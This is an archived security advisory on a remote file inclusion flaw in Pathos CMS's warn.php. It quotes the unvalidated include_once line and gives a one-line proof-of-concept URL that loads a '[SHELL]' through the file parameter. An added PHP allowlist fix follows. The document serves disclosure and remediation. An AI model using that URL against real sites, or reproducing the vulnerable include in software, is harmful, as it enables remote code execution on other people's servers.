Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion Vulnerability

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16664
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

Pathos Content Management System


Found by kezzap66345



Script download: http://sourceforge.net/projects/pathos/
Direct link: http://sourceforge.net/project/showfiles.php?group_id=103303&package_id=110862&release_id=243512



ERROR#1: File: warn.php


include_once($_GET['file'] . ".html"); <<< RFI: the "file" request parameter is passed to include_once() without validation


RFI#1:

http://SITE.com/path/warn.php?file=[SHELL]



Thanks: S.H.i.K.a.A, x0r0n, a.j.a.n, SiiRCiCOCUK, str0ke

milw0rm.com [2007-04-09]
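
The include_once() line quoted above lets the request choose the start of the included path, so the fixed ".html" suffix does not confine it to the application's own files. The following is an added example, not code from Pathos or from the advisory, of one way to handle the same parameter safely; WARN_DIR, WARN_PAGES, resolve_warn_page() and the page names are hypothetical.

```php
<?php
// Added example (not Pathos code). WARN_DIR, WARN_PAGES and the page
// names below are hypothetical and stand in for the application's own.

// Vulnerable pattern from the advisory, kept for comparison:
//   include_once($_GET['file'] . ".html");

const WARN_DIR = __DIR__ . '/warnings';   // assumed fixed directory of static pages

// Allowlist: request value => file name on disk.
// Nothing outside this map can be loaded, whatever the request contains.
const WARN_PAGES = [
    'expired'  => 'expired.html',
    'disabled' => 'disabled.html',
];

/**
 * Map the request value to an absolute path inside WARN_DIR.
 * Returns null for anything that is not an allowlisted page.
 */
function resolve_warn_page($requested): ?string
{
    // Arrays (file[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, WARN_PAGES)) {
        return null;
    }
    $base = realpath(WARN_DIR);
    $path = realpath(WARN_DIR . '/' . WARN_PAGES[$requested]);
    // Defence in depth: the file must exist and resolve under WARN_DIR
    // (catches a symlinked or misconfigured allowlist entry).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_warn_page($_GET['file'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
// Static HTML is sent as data with readfile(), never executed via include.
readfile($page);
```

Keeping allow_url_include = Off in php.ini additionally stops include from fetching URLs, but it does not stop inclusion of local files, so the allowlist is still required.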